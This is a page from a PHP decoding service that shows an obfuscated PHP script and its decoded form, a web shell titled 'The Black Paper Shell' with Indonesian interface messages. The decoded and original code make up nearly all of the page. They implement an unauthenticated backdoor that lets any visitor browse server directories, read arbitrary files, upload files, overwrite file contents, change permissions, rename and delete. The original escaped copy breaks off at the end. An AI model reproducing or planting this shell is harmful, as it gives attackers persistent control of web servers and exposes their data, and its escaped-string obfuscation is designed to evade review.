Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

goto IWKE4; wVoF9: if (isset($_GET["\146\151\154\145\163\162\x63"])) { echo "\x3c\x74\162..

Decoded Output download

<?   goto IWKE4; wVoF9: if (isset($_GET["filesrc"])) { echo "<tr><td>Current File : "; echo $_GET["filesrc"]; echo "</tr></td></table><br />"; echo "<pre>" . htmlspecialchars(file_get_contents($_GET["filesrc"])) . "</pre>"; } elseif (isset($_GET["option"]) && $_POST["opt"] != "delete") { echo "</table><br /><center>" . $_POST["path"] . "<br /><br />"; if ($_POST["opt"] == "chmod") { if (isset($_POST["perm"])) { if (chmod($_POST["path"], $_POST["perm"])) { echo "<font color="green">mengganti akses sukses !!</font><br />"; } else { echo "<font color="red">gagal mengganti aksesnya !</font><br />"; } } echo "<form method="POST">
Permission : <input name="perm" type="text" size="4" value="" . substr(sprintf("%o", fileperms($_POST["path"])), -4) . "" />
<input type="hidden" name="path" value="" . $_POST["path"] . "">\xa<input type="hidden" name="opt" value="chmod">
<input type="submit" value="Go" />
</form>"; } elseif ($_POST["opt"] == "rename") { if (isset($_POST["newname"])) { if (rename($_POST["path"], $path . "/" . $_POST["newname"])) { echo "<font color="green">selamat bang jago,anda berhasil mengganti nama!</font><br />"; } else { echo "<font color="red">yah kita gagal mengganti nama !</font><br />"; } $_POST["name"] = $_POST["newname"]; } echo "<form method="POST">
New Name : <input name="newname" type="text" size="20" value="" . $_POST["name"] . "" />
<input type="hidden" name="path" value="" . $_POST["path"] . "">\xa<input type="hidden" name="opt" value="rename">\xa<input type="submit" value="Go" />
</form>"; } elseif ($_POST["opt"] == "edit") { if (isset($_POST["src"])) { $fp = fopen($_POST["path"], "w"); if (fwrite($fp, $_POST["src"])) { echo "<font color="green">Edit File Success!</font><br />"; } else { echo "<font color="red">Failed for Edit File!</font><br />"; } fclose($fp); } echo "<form method="POST">
<textarea cols=80 rows=20 name="src">" . htmlspecialchars(file_get_contents($_POST["path"])) . "</textarea><br />
<input type="hidden" name="path" value="" . $_POST["path"] . "">\xa<input type="hidden" name="opt" value="edit">
<input type="submit" value="Go" />\xa</form>"; } echo "</center>"; } else { echo "</table><br /><center>"; if (isset($_GET["option"]) && $_POST["opt"] == "delete") { if ($_POST["type"] == "dir") { if (rmdir($_POST["path"])) { echo "<font color="green">Delete Dir Success!</font><br />"; } else { echo "<font color="red">Failed for Delete Dir!</font><br />"; } } elseif ($_POST["type"] == "file") { if (unlink($_POST["path"])) { echo "<font color="green">Delete File Success!</font><br />"; } else { echo "<font color="red">Failed for Edit File!</font><br />"; } } } echo "</center>"; $scandir = scandir($path); echo "<div id="content"><table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">\xa<tr class="first">
<td><center>Nama File</center></td>
<td><center>Ukuran file</center></td>
<td><center>Akses</center></td>
<td><center>Pilihan</center></td>\xa</tr>"; foreach ($scandir as $dir) { if (!is_dir("{$path}/{$dir}") || $dir == "." || $dir == "..") { continue; } echo "<tr>\xa<td><a href="?path={$path}/{$dir}">{$dir}</a></td>\xa<td><center><font color=#d3d3d3>--</font></center></td>
<td><center>"; if (is_writable("{$path}/{$dir}")) { echo "<font color="#4D4D4D">"; } elseif (!is_readable("{$path}/{$dir}")) { echo "<font color="red">"; } echo perms("{$path}/{$dir}"); if (is_writable("{$path}/{$dir}") || !is_readable("{$path}/{$dir}")) { echo "</font>"; } echo "</center></td>
<td><center><form method="POST" action="?option&path={$path}">

<button name="opt" value="delete">Delete</button>\xa<button name="opt" value="chmod">Chmod</button>
<button name="opt" value="rename">Rename</button>
<button name="opt" value="edit">Edit</button>\xa\xa<input type="hidden" name="type" value="dir">\xa<input type="hidden" name="name" value="{$dir}">\xa<input type="hidden" name="path" value="{$path}/{$dir}">
\xa</form></center></td>
</tr>"; } echo "<tr class="first"><td></td><td></td><td></td><td></td></tr>"; foreach ($scandir as $file) { if (!is_file("{$path}/{$file}")) { continue; } $size = filesize("{$path}/{$file}") / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2) . " MB"; } else { $size = $size . " KB"; } echo "<tr>
<td><a href="?filesrc={$path}/{$file}&path={$path}">{$file}</a></td>\xa<td><center>" . $size . "</center></td>\xa<td><center>"; if (is_writable("{$path}/{$file}")) { echo "<font color="#4D4D4D">"; } elseif (!is_readable("{$path}/{$file}")) { echo "<font color="red">"; } echo perms("{$path}/{$file}"); if (is_writable("{$path}/{$file}") || !is_readable("{$path}/{$file}")) { echo "</font>"; } echo "</center></td>
<td><center><form method="POST" action="?option&path={$path}">


<button name="opt" value="delete">Delete</button>
<button name="opt" value="chmod">Chmod</button>\xa<button name="opt" value="rename">Rename</button>
<button name="opt" value="edit">Edit</button>\xa
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="{$file}">\xa<input type="hidden" name="path" value="{$path}/{$file}">\xa
</form></center></td>
</tr>"; } echo "</table>
</div>"; } goto aS0Bl; wNrls: if (isset($_FILES["file"])) { if (copy($_FILES["file"]["tmp_name"], $path . "/" . $_FILES["file"]["name"])) { echo "<font color="green">selamat anda berasil mengupload file !</font><br />"; } else { echo "<font color="red">maaf bang,gagal mengupload file!</font><br />"; } } goto KiHiY; k1sQa: function perms($file) { $perms = fileperms($file); if (($perms & 49152) == 49152) { $info = "s"; } elseif (($perms & 40960) == 40960) { $info = "l"; } elseif (($perms & 32768) == 32768) { $info = "-"; } elseif (($perms & 24576) == 24576) { $info = "b"; } elseif (($perms & 16384) == 16384) { $info = "d"; } elseif (($perms & 8192) == 8192) { $info = "c"; } elseif (($perms & 4096) == 4096) { $info = "p"; } else { $info = "u"; } $info .= $perms & 256 ? "r" : "-"; $info .= $perms & 128 ? "w" : "-"; $info .= $perms & 64 ? $perms & 2048 ? "s" : "x" : ($perms & 2048 ? "S" : "-"); $info .= $perms & 32 ? "r" : "-"; $info .= $perms & 16 ? "w" : "-"; $info .= $perms & 8 ? $perms & 1024 ? "s" : "x" : ($perms & 1024 ? "S" : "-"); $info .= $perms & 4 ? "r" : "-"; $info .= $perms & 2 ? "w" : "-"; $info .= $perms & 1 ? $perms & 512 ? "t" : "x" : ($perms & 512 ? "T" : "-"); return $info; } goto JcIh2; IWKE4: echo "<!DOCTYPE HTML>\xa<HTML>\xa<HEAD>\xa<link href="" rel="stylesheet" type="text/css">
<title>The Black Paper</title><link rel="SHORTCUT ICON"  href="https://theblackpaper.org/TBP.jpg">
<style>
body{
font-family: "Courier", cursive;
color: #fff;
background-color: #000;
text-shadow:0px 0px 1px #757575;
}
#content tr:hover{
background-color: #000;
text-shadow:0px 0px 10px #fff;\xa}
#content .first{
background-color: #4D4D4D;
}
#content .first:hover{
background-color: #4D4D4D;
text-shadow:0px 0px 1px #757575;\xa}
H1{
font-family: "Courier", cursive;
color: #fff;
}
a{\xacolor: #fff;
text-decoration: none;
}
a:hover{
color: #fff;
text-shadow:0px 0px 5px #ffffff;\xa}\xainput,select,textarea{\xaborder: 1px #fff solid;\xa-moz-border-radius: 5px;\xa-webkit-border-radius:5px;\xaborder-radius:5px;\xa}\xafoot {
\x9	background-color: black;
  color: white;
	}\xa</style>\xa</HEAD>
<BODY bgcolor="white"><center>\xa<img src="https://1.bp.blogspot.com/-eyN8qlix3HM/X1N3jkh3RJI/AAAAAAAAAYE/04Okt18xX0MVZNoPUjQvLAbe0oNHiHzHACLcBGAsYHQ/s320/86591478-21a3-47f0-9ad0-1342297e9e6e.jpg"></center>
<H1 class="foot"><center>The Black Paper</center></H1><hr><marquee class="foot">The Black Paper Shell</marquee><hr>
<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">\xa<tr><td>Current Path : "; goto XRK4K; FYisV: $path = str_replace("\", "/", $path); goto GgFzf; ize1L: foreach ($paths as $id => $pat) { if ($pat == '' && $id == 0) { $a = true; echo "<a href="?path=/">/</a>"; continue; } if ($pat == '') { continue; } echo "<a href="?path="; for ($i = 0; $i <= $id; $i++) { echo "{$paths[$i]}"; if ($i != $id) { echo "/"; } } echo "">" . $pat . "</a>/"; } goto QljbJ; XRK4K: if (isset($_GET["path"])) { $path = $_GET["path"]; } else { $path = getcwd(); } goto FYisV; KiHiY: echo "<form enctype="multipart/form-data" method="POST">
Masukan File : <input type="file" name="file" />
<input type="submit" value="upload" />
</form>\xa</td></tr>"; goto wVoF9; aS0Bl: echo "\xa</BODY>
</HTML>"; goto k1sQa; GgFzf: $paths = explode("/", $path); goto ize1L; QljbJ: echo "</td></tr><tr><td>"; goto wNrls; JcIh2:  
 ?>

Did this file decode correctly?

Original Code

 goto IWKE4; wVoF9: if (isset($_GET["\146\151\154\145\163\162\x63"])) { echo "\x3c\x74\162\76\74\x74\x64\76\103\165\162\x72\145\x6e\164\x20\x46\151\x6c\x65\x20\x3a\x20"; echo $_GET["\146\x69\x6c\145\x73\162\143"]; echo "\x3c\57\164\162\76\74\x2f\x74\144\x3e\x3c\57\x74\x61\142\x6c\145\x3e\74\x62\x72\40\x2f\x3e"; echo "\74\x70\x72\x65\x3e" . htmlspecialchars(file_get_contents($_GET["\x66\x69\x6c\x65\x73\162\x63"])) . "\x3c\57\x70\x72\x65\76"; } elseif (isset($_GET["\157\160\164\x69\x6f\x6e"]) && $_POST["\x6f\160\x74"] != "\144\x65\154\145\x74\145") { echo "\x3c\57\x74\x61\x62\x6c\x65\x3e\x3c\142\x72\x20\x2f\76\74\x63\x65\x6e\x74\x65\x72\x3e" . $_POST["\160\x61\164\x68"] . "\x3c\x62\162\x20\57\76\x3c\x62\162\40\x2f\x3e"; if ($_POST["\157\160\164"] == "\x63\150\x6d\x6f\x64") { if (isset($_POST["\x70\145\162\x6d"])) { if (chmod($_POST["\x70\x61\x74\150"], $_POST["\x70\x65\x72\155"])) { echo "\74\146\157\156\x74\40\143\157\x6c\x6f\x72\75\x22\147\162\145\145\156\42\x3e\155\145\x6e\x67\147\141\156\x74\x69\x20\141\153\x73\145\163\x20\x73\165\153\163\145\163\40\41\x21\74\57\x66\157\x6e\164\76\74\x62\162\40\57\76"; } else { echo "\x3c\x66\x6f\156\164\40\143\157\x6c\157\x72\x3d\42\162\x65\144\42\x3e\147\x61\x67\x61\x6c\x20\155\145\x6e\x67\147\141\x6e\x74\151\x20\x61\x6b\x73\x65\x73\156\x79\141\x20\41\x3c\x2f\x66\157\156\x74\x3e\74\142\162\40\57\x3e"; } } echo "\74\x66\x6f\x72\155\x20\155\x65\x74\x68\x6f\144\75\x22\x50\117\123\124\42\76\12\120\x65\x72\x6d\x69\x73\x73\151\157\x6e\40\x3a\x20\74\x69\156\160\165\164\40\x6e\x61\155\x65\75\42\x70\x65\162\x6d\42\x20\x74\x79\x70\x65\x3d\42\164\145\170\x74\x22\x20\163\x69\x7a\145\x3d\x22\64\42\40\x76\141\154\165\x65\75\x22" . substr(sprintf("\45\x6f", fileperms($_POST["\x70\141\x74\x68"])), -4) . "\x22\x20\57\x3e\12\x3c\x69\156\x70\x75\x74\x20\x74\x79\x70\145\75\42\150\151\x64\x64\x65\x6e\42\x20\156\x61\155\x65\x3d\42\160\141\x74\x68\42\40\166\141\x6c\x75\x65\75\42" . $_POST["\x70\x61\x74\150"] . "\x22\76\xa\x3c\151\x6e\160\165\x74\40\164\x79\x70\145\x3d\42\x68\x69\144\144\x65\x6e\42\40\156\141\155\145\x3d\42\x6f\x70\x74\42\40\166\141\x6c\165\x65\x3d\x22\x63\150\x6d\x6f\x64\42\x3e\12\x3c\151\x6e\160\165\164\x20\164\x79\160\x65\75\42\163\x75\x62\x6d\151\x74\x22\x20\166\141\154\x75\x65\x3d\42\x47\157\42\40\x2f\x3e\12\74\57\146\x6f\x72\155\x3e"; } elseif ($_POST["\157\x70\164"] == "\x72\145\156\x61\155\x65") { if (isset($_POST["\156\145\x77\156\141\x6d\145"])) { if (rename($_POST["\x70\141\164\x68"], $path . "\57" . $_POST["\x6e\145\167\x6e\141\155\x65"])) { echo "\74\146\x6f\x6e\164\40\x63\157\x6c\x6f\162\x3d\x22\147\x72\145\145\x6e\x22\76\x73\145\154\x61\x6d\x61\x74\x20\142\x61\156\147\40\152\141\147\x6f\x2c\141\156\144\x61\40\142\x65\162\150\x61\x73\151\154\40\x6d\x65\156\147\147\x61\x6e\x74\x69\40\156\141\x6d\141\41\74\57\146\x6f\x6e\164\76\74\x62\162\x20\x2f\76"; } else { echo "\74\x66\157\x6e\x74\x20\x63\157\x6c\x6f\x72\75\42\x72\145\x64\x22\x3e\171\141\150\x20\153\x69\164\141\x20\147\x61\147\x61\154\40\x6d\x65\156\147\x67\141\x6e\x74\151\x20\x6e\x61\155\x61\x20\x21\x3c\x2f\x66\157\x6e\x74\x3e\x3c\142\162\40\x2f\x3e"; } $_POST["\156\x61\x6d\x65"] = $_POST["\156\x65\167\x6e\141\155\x65"]; } echo "\74\x66\x6f\x72\155\x20\155\145\164\150\x6f\x64\x3d\x22\x50\x4f\123\x54\42\76\12\116\145\167\40\116\141\x6d\145\40\x3a\x20\x3c\151\156\160\165\x74\x20\156\x61\155\x65\x3d\x22\156\x65\167\156\x61\155\x65\42\40\164\x79\x70\x65\75\x22\x74\x65\170\164\42\x20\163\151\172\x65\x3d\42\x32\60\x22\40\x76\x61\x6c\x75\x65\x3d\42" . $_POST["\156\141\x6d\x65"] . "\x22\x20\57\x3e\12\x3c\151\156\160\x75\164\40\164\x79\160\x65\75\42\x68\151\144\144\145\x6e\x22\x20\x6e\x61\155\x65\75\x22\160\141\x74\150\x22\40\166\x61\154\x75\145\x3d\42" . $_POST["\160\x61\x74\150"] . "\42\76\xa\74\151\156\160\165\x74\x20\x74\171\160\145\x3d\42\x68\151\144\144\145\x6e\42\x20\156\x61\155\x65\75\42\157\x70\x74\42\40\x76\141\x6c\x75\x65\75\42\x72\145\156\x61\155\x65\42\76\xa\x3c\x69\x6e\160\165\x74\x20\x74\171\160\x65\75\42\x73\x75\x62\x6d\x69\x74\42\40\x76\x61\154\165\145\x3d\x22\x47\157\42\x20\57\x3e\12\x3c\57\x66\157\x72\155\x3e"; } elseif ($_POST["\157\x70\164"] == "\145\144\151\x74") { if (isset($_POST["\163\162\x63"])) { $fp = fopen($_POST["\160\141\x74\150"], "\x77"); if (fwrite($fp, $_POST["\163\x72\x63"])) { echo "\74\x66\157\x6e\x74\40\x63\x6f\154\157\x72\75\42\147\162\145\x65\156\42\76\x45\144\x69\x74\x20\106\x69\154\145\40\123\165\x63\143\x65\x73\163\41\74\x2f\146\x6f\156\x74\x3e\74\142\x72\40\x2f\76"; } else { echo "\74\146\157\156\x74\x20\x63\157\x6c\157\x72\75\42\162\145\144\42\x3e\x46\141\x69\154\x65\144\40\146\157\x72\x20\x45\144\x69\x74\40\x46\x69\x6c\x65\41\74\x2f\146\157\x6e\x74\76\74\142\162\x20\x2f\76"; } fclose($fp); } echo "\74\x66\157\x72\x6d\x20\x6d\145\x74\x68\157\x64\x3d\x22\x50\x4f\123\124\x22\76\12\x3c\164\x65\170\x74\x61\x72\145\x61\x20\x63\x6f\154\x73\75\70\x30\x20\162\x6f\167\x73\75\62\x30\x20\156\141\155\x65\x3d\42\163\162\x63\42\x3e" . htmlspecialchars(file_get_contents($_POST["\160\x61\x74\x68"])) . "\74\x2f\x74\145\170\164\141\162\145\141\x3e\74\x62\x72\x20\57\76\12\x3c\x69\x6e\160\165\164\40\164\171\x70\x65\x3d\x22\150\151\x64\x64\145\x6e\x22\x20\156\x61\155\145\x3d\42\160\141\164\x68\x22\40\x76\141\154\x75\145\75\42" . $_POST["\x70\x61\x74\x68"] . "\42\76\xa\x3c\151\x6e\160\x75\164\40\164\171\160\x65\75\x22\x68\x69\x64\144\x65\x6e\x22\x20\156\x61\155\145\x3d\42\157\x70\x74\x22\40\166\x61\x6c\x75\145\x3d\42\145\144\151\x74\x22\x3e\12\x3c\151\156\160\x75\x74\x20\164\171\x70\145\75\42\x73\x75\142\x6d\151\164\42\40\x76\141\x6c\x75\x65\x3d\42\x47\x6f\42\x20\x2f\76\xa\74\57\x66\157\162\x6d\76"; } echo "\74\57\x63\145\156\x74\145\162\76"; } else { echo "\74\x2f\164\141\x62\154\x65\76\x3c\x62\x72\40\57\x3e\74\143\x65\156\x74\145\162\x3e"; if (isset($_GET["\x6f\160\164\x69\157\156"]) && $_POST["\x6f\x70\164"] == "\144\x65\154\145\164\145") { if ($_POST["\x74\171\x70\x65"] == "\144\x69\162") { if (rmdir($_POST["\x70\141\x74\x68"])) { echo "\x3c\x66\157\156\x74\40\x63\157\154\157\x72\75\42\147\162\x65\x65\156\42\76\x44\145\x6c\145\x74\x65\40\x44\151\162\40\123\165\143\x63\x65\163\163\x21\74\x2f\146\x6f\156\x74\76\74\142\162\x20\x2f\x3e"; } else { echo "\74\146\x6f\x6e\164\x20\x63\157\x6c\x6f\162\x3d\x22\x72\145\144\42\x3e\x46\141\151\x6c\x65\x64\x20\x66\x6f\162\x20\104\145\154\145\164\x65\40\x44\x69\162\41\74\x2f\x66\157\156\x74\x3e\x3c\x62\162\x20\57\x3e"; } } elseif ($_POST["\x74\x79\x70\x65"] == "\x66\x69\154\x65") { if (unlink($_POST["\160\x61\164\x68"])) { echo "\x3c\146\x6f\x6e\x74\x20\x63\157\x6c\157\x72\x3d\x22\147\x72\145\x65\x6e\42\76\104\x65\x6c\x65\164\x65\40\106\x69\x6c\145\x20\123\x75\143\x63\x65\163\163\41\74\57\146\x6f\156\164\x3e\x3c\x62\162\40\x2f\x3e"; } else { echo "\x3c\146\157\156\x74\x20\x63\x6f\x6c\157\x72\75\42\x72\x65\144\x22\x3e\x46\141\x69\x6c\x65\x64\x20\146\x6f\162\40\x45\x64\151\x74\x20\106\x69\154\145\41\x3c\57\x66\157\x6e\x74\x3e\74\142\x72\40\57\76"; } } } echo "\x3c\57\143\145\156\x74\x65\x72\x3e"; $scandir = scandir($path); echo "\74\144\x69\x76\40\x69\x64\x3d\x22\x63\x6f\156\x74\145\x6e\x74\42\x3e\74\164\141\x62\x6c\145\x20\167\x69\x64\164\150\75\x22\61\x30\x30\x25\x22\40\142\157\x72\x64\145\x72\75\42\x30\42\x20\143\145\154\x6c\x70\x61\x64\144\151\156\147\75\x22\63\42\x20\143\145\154\x6c\x73\160\x61\143\151\x6e\147\75\42\x31\42\x20\141\x6c\x69\147\156\75\x22\143\x65\x6e\164\x65\x72\x22\x3e\xa\x3c\164\x72\40\x63\154\141\163\163\x3d\x22\x66\151\162\163\x74\x22\x3e\12\74\164\144\x3e\x3c\143\x65\x6e\164\x65\x72\76\x4e\x61\x6d\x61\40\106\151\154\x65\74\57\x63\x65\156\x74\145\x72\76\74\57\x74\144\x3e\12\x3c\164\x64\76\x3c\x63\x65\x6e\x74\145\x72\x3e\125\153\165\x72\x61\156\40\146\x69\x6c\x65\x3c\57\x63\x65\156\x74\145\162\76\74\x2f\164\144\x3e\12\74\164\x64\x3e\x3c\143\x65\156\164\145\162\76\101\153\163\x65\x73\74\x2f\x63\145\156\164\x65\x72\76\74\x2f\x74\144\x3e\12\x3c\x74\x64\x3e\74\x63\x65\156\164\145\162\x3e\x50\151\x6c\x69\x68\141\156\x3c\x2f\x63\145\156\164\145\x72\x3e\x3c\57\x74\x64\x3e\xa\x3c\x2f\164\162\76"; foreach ($scandir as $dir) { if (!is_dir("{$path}\x2f{$dir}") || $dir == "\x2e" || $dir == "\x2e\56") { continue; } echo "\x3c\164\x72\76\xa\x3c\x74\x64\x3e\x3c\141\x20\150\x72\145\146\75\42\77\160\141\164\150\x3d{$path}\x2f{$dir}\x22\x3e{$dir}\74\57\141\x3e\x3c\57\x74\144\76\xa\74\x74\x64\x3e\x3c\x63\x65\156\164\145\162\x3e\74\x66\157\x6e\x74\x20\143\x6f\154\x6f\162\x3d\x23\144\x33\x64\63\144\x33\76\x2d\55\x3c\x2f\x66\x6f\x6e\164\x3e\74\x2f\143\145\x6e\x74\145\162\76\74\57\164\144\76\12\74\164\x64\76\74\143\x65\156\164\145\x72\x3e"; if (is_writable("{$path}\57{$dir}")) { echo "\74\x66\x6f\156\164\40\x63\157\154\157\162\75\x22\43\x34\x44\x34\x44\64\x44\42\76"; } elseif (!is_readable("{$path}\x2f{$dir}")) { echo "\x3c\x66\157\x6e\164\40\143\x6f\154\157\x72\75\x22\x72\x65\x64\42\x3e"; } echo perms("{$path}\57{$dir}"); if (is_writable("{$path}\x2f{$dir}") || !is_readable("{$path}\x2f{$dir}")) { echo "\74\x2f\x66\157\x6e\164\x3e"; } echo "\74\x2f\x63\x65\x6e\164\x65\x72\x3e\x3c\x2f\x74\144\x3e\12\x3c\164\144\x3e\74\x63\x65\156\164\x65\162\x3e\74\x66\157\x72\155\40\155\145\164\x68\x6f\x64\x3d\42\120\117\123\x54\x22\40\x61\143\x74\x69\157\x6e\75\42\x3f\157\x70\164\151\x6f\156\46\160\141\x74\150\x3d{$path}\42\x3e\12\12\x3c\x62\x75\164\164\x6f\x6e\40\x6e\x61\155\145\x3d\x22\157\x70\x74\42\40\166\x61\x6c\x75\145\x3d\x22\144\145\x6c\x65\164\145\x22\x3e\x44\x65\x6c\x65\x74\145\x3c\x2f\x62\x75\x74\x74\x6f\156\x3e\xa\74\x62\165\164\164\157\156\x20\156\141\x6d\145\75\42\157\x70\x74\x22\40\x76\x61\154\x75\x65\x3d\x22\143\x68\155\x6f\144\x22\x3e\x43\x68\155\x6f\144\x3c\x2f\x62\x75\164\164\157\156\76\12\x3c\142\165\x74\x74\x6f\x6e\40\x6e\x61\x6d\145\75\x22\x6f\160\164\x22\40\x76\x61\154\165\x65\x3d\42\162\145\x6e\x61\x6d\145\x22\x3e\x52\x65\156\x61\x6d\x65\x3c\x2f\142\165\x74\x74\x6f\x6e\76\12\74\x62\165\164\x74\157\x6e\40\156\141\x6d\145\x3d\x22\157\x70\x74\42\x20\166\141\x6c\165\x65\x3d\x22\145\x64\x69\164\42\x3e\x45\x64\x69\164\x3c\57\x62\165\x74\164\x6f\x6e\x3e\xa\xa\74\x69\x6e\160\x75\164\x20\x74\x79\160\145\75\x22\x68\x69\144\144\x65\x6e\x22\40\156\x61\x6d\145\75\x22\164\171\160\x65\x22\x20\x76\141\154\165\x65\x3d\x22\144\151\162\42\76\xa\74\x69\156\x70\165\164\40\x74\171\160\x65\x3d\x22\150\x69\x64\x64\x65\156\x22\40\156\141\x6d\145\x3d\x22\156\x61\155\x65\x22\x20\x76\x61\x6c\165\145\75\42{$dir}\x22\x3e\xa\x3c\x69\x6e\160\x75\x74\40\x74\x79\x70\x65\x3d\x22\150\x69\x64\x64\x65\156\x22\x20\x6e\141\x6d\x65\x3d\42\x70\x61\x74\x68\x22\x20\166\141\154\165\145\x3d\x22{$path}\x2f{$dir}\x22\x3e\12\xa\74\x2f\x66\157\x72\x6d\76\x3c\57\143\x65\156\x74\145\x72\76\74\x2f\x74\144\76\12\x3c\57\x74\x72\76"; } echo "\74\x74\162\40\143\x6c\x61\x73\x73\x3d\x22\x66\151\162\163\x74\x22\x3e\x3c\164\144\x3e\74\57\164\x64\x3e\x3c\164\x64\76\74\x2f\164\x64\x3e\74\x74\x64\x3e\x3c\x2f\x74\x64\x3e\74\x74\x64\76\74\x2f\x74\144\76\x3c\57\x74\x72\x3e"; foreach ($scandir as $file) { if (!is_file("{$path}\57{$file}")) { continue; } $size = filesize("{$path}\x2f{$file}") / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2) . "\40\115\x42"; } else { $size = $size . "\x20\x4b\x42"; } echo "\x3c\x74\x72\76\12\x3c\x74\x64\x3e\x3c\x61\40\x68\162\x65\x66\75\x22\77\146\x69\154\x65\163\x72\143\75{$path}\57{$file}\x26\x70\141\164\150\x3d{$path}\42\x3e{$file}\74\x2f\141\76\x3c\x2f\164\x64\x3e\xa\x3c\x74\x64\76\x3c\x63\x65\156\164\x65\162\x3e" . $size . "\x3c\57\x63\x65\x6e\164\x65\162\76\x3c\x2f\164\144\x3e\xa\74\x74\144\76\x3c\143\x65\156\164\145\x72\76"; if (is_writable("{$path}\57{$file}")) { echo "\74\x66\x6f\156\164\40\x63\157\x6c\157\162\x3d\x22\43\x34\104\x34\x44\x34\x44\42\76"; } elseif (!is_readable("{$path}\57{$file}")) { echo "\x3c\146\157\156\164\40\143\157\x6c\157\162\75\x22\162\x65\144\42\x3e"; } echo perms("{$path}\57{$file}"); if (is_writable("{$path}\x2f{$file}") || !is_readable("{$path}\57{$file}")) { echo "\x3c\x2f\146\x6f\x6e\x74\x3e"; } echo "\x3c\x2f\x63\145\156\164\x65\162\x3e\74\57\x74\x64\76\12\x3c\x74\144\x3e\74\x63\x65\156\x74\145\162\x3e\x3c\x66\x6f\x72\x6d\x20\155\x65\x74\x68\157\x64\75\42\120\x4f\x53\124\x22\x20\141\x63\x74\x69\157\x6e\x3d\42\77\x6f\160\164\x69\x6f\x6e\46\160\x61\164\150\x3d{$path}\42\76\12\12\12\x3c\x62\165\x74\x74\157\156\x20\x6e\x61\155\x65\75\42\157\160\x74\42\x20\x76\141\x6c\165\x65\75\x22\144\145\154\145\164\x65\42\76\x44\145\154\x65\164\x65\x3c\x2f\x62\x75\x74\x74\157\156\76\12\74\x62\165\x74\164\x6f\156\40\156\x61\155\145\x3d\42\157\160\164\42\x20\166\141\x6c\165\145\x3d\x22\143\x68\155\157\144\42\76\x43\x68\x6d\x6f\x64\x3c\57\x62\x75\164\164\x6f\x6e\x3e\xa\x3c\x62\165\x74\164\157\156\x20\x6e\141\155\x65\75\x22\x6f\160\164\x22\40\166\x61\x6c\x75\x65\75\42\x72\145\156\141\x6d\x65\42\x3e\122\145\x6e\x61\x6d\x65\74\57\x62\165\x74\164\x6f\x6e\76\12\x3c\x62\x75\164\164\157\x6e\x20\x6e\141\x6d\145\x3d\42\157\160\164\x22\40\166\x61\x6c\165\145\x3d\x22\x65\x64\151\164\x22\76\x45\x64\151\164\74\x2f\142\x75\164\x74\157\x6e\76\xa\12\x3c\x69\x6e\160\165\x74\40\164\x79\x70\145\75\42\150\151\144\x64\145\156\x22\40\x6e\141\155\x65\75\42\164\171\160\x65\x22\40\x76\141\x6c\x75\145\x3d\x22\x66\x69\154\x65\42\76\12\74\x69\x6e\160\165\164\40\x74\171\x70\145\75\42\150\x69\144\x64\145\156\x22\40\x6e\141\155\x65\75\42\x6e\x61\x6d\x65\x22\40\x76\x61\154\x75\x65\x3d\42{$file}\x22\x3e\xa\x3c\151\x6e\x70\165\164\40\164\x79\x70\x65\x3d\x22\x68\151\144\144\145\156\42\40\x6e\141\155\x65\x3d\42\x70\x61\x74\150\42\x20\x76\x61\x6c\x75\x65\x3d\42{$path}\57{$file}\42\76\xa\12\x3c\57\146\x6f\162\x6d\x3e\74\57\x63\145\x6e\164\x65\162\x3e\74\57\164\144\x3e\12\74\57\x74\162\x3e"; } echo "\74\57\x74\x61\142\x6c\x65\x3e\12\x3c\57\x64\x69\x76\x3e"; } goto aS0Bl; wNrls: if (isset($_FILES["\146\151\x6c\145"])) { if (copy($_FILES["\146\151\154\x65"]["\164\x6d\x70\x5f\156\141\x6d\x65"], $path . "\x2f" . $_FILES["\x66\151\154\145"]["\156\141\x6d\x65"])) { echo "\x3c\146\x6f\156\x74\x20\x63\x6f\154\157\x72\75\42\x67\x72\x65\x65\156\42\x3e\x73\x65\x6c\x61\x6d\x61\164\40\x61\x6e\x64\x61\40\142\145\x72\141\163\x69\x6c\40\x6d\x65\x6e\147\165\x70\x6c\157\141\x64\x20\x66\151\x6c\145\x20\41\74\x2f\x66\x6f\x6e\x74\76\74\142\x72\x20\x2f\x3e"; } else { echo "\74\x66\x6f\156\164\x20\x63\157\x6c\x6f\162\75\42\x72\145\x64\42\76\x6d\x61\x61\x66\40\142\141\x6e\147\x2c\147\x61\x67\x61\x6c\x20\155\145\156\x67\165\160\154\x6f\x61\x64\x20\146\151\x6c\x65\x21\74\x2f\x66\x6f\x6e\164\x3e\74\x62\162\x20\x2f\76"; } } goto KiHiY; k1sQa: function perms($file) { $perms = fileperms($file); if (($perms & 49152) == 49152) { $info = "\x73"; } elseif (($perms & 40960) == 40960) { $info = "\x6c"; } elseif (($perms & 32768) == 32768) { $info = "\x2d"; } elseif (($perms & 24576) == 24576) { $info = "\x62"; } elseif (($perms & 16384) == 16384) { $info = "\x64"; } elseif (($perms & 8192) == 8192) { $info = "\x63"; } elseif (($perms & 4096) == 4096) { $info = "\x70"; } else { $info = "\165"; } $info .= $perms & 256 ? "\162" : "\55"; $info .= $perms & 128 ? "\x77" : "\55"; $info .= $perms & 64 ? $perms & 2048 ? "\x73" : "\170" : ($perms & 2048 ? "\x53" : "\x2d"); $info .= $perms & 32 ? "\x72" : "\55"; $info .= $perms & 16 ? "\x77" : "\x2d"; $info .= $perms & 8 ? $perms & 1024 ? "\x73" : "\x78" : ($perms & 1024 ? "\x53" : "\55"); $info .= $perms & 4 ? "\x72" : "\x2d"; $info .= $perms & 2 ? "\167" : "\55"; $info .= $perms & 1 ? $perms & 512 ? "\164" : "\x78" : ($perms & 512 ? "\124" : "\x2d"); return $info; } goto JcIh2; IWKE4: echo 